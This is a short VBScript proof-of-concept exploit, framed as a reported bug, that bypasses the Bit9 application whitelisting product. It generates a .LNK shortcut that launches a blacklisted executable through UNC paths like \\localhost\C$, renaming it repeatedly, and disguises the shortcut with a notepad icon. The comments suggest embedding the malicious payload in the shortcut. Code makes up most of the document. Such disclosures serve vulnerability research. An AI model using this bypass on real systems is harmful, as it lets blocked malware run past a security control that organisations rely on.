' Reported a bug in Bit9 whitelisting soln, where

' A blacklisted/malicious executable (c:\test\test.exe) can bypass Bit9 if run via its UNC path "\\localhost\C$\any.exe" or any other

' UNC equivalent path.

' Attack vector could be .LNK or .PS1 file. I prefer .Lnk since it is rarely blacklisted.

' The VBS script below generates a POC .LNK file that exploits that.

' We can also embed the malicious payload inside the .LNK file itself to have a standalone .LNK file.

' https://twitter.com/waleedassar

set WshShell = WScript. CreateObject ( "WScript.Shell" )

set oShellLink = WshShell.CreateShortcut( "B.Lnk" )

oShellLink.TargetPath = "Cmd.exe"

oShellLink.Arguments = "/C start \\localhost\C$\test\test.exe & rename \\localhost\C$\test\test.exe test_1.exe & start \\localhost\C$\test\test_1.exe & rename \\localhost\C$\test\test_1.exe test_2.exe & start \\localhost\C$\test\test_2.exe & rename \\localhost\C$\test\test_2.exe test_3.exe & start \\localhost\C$\test\test_3.exe & rename \\localhost\C$\test\test_3.exe test_4.exe & start \\localhost\C$\test\test_4.exe & rename \\localhost\C$\test\test_4.exe test_5.exe"

oShellLink.WindowStyle = 1

oShellLink.IconLocation = "notepad.exe, 0"

oShellLink.Description = "Bit9 Bypass"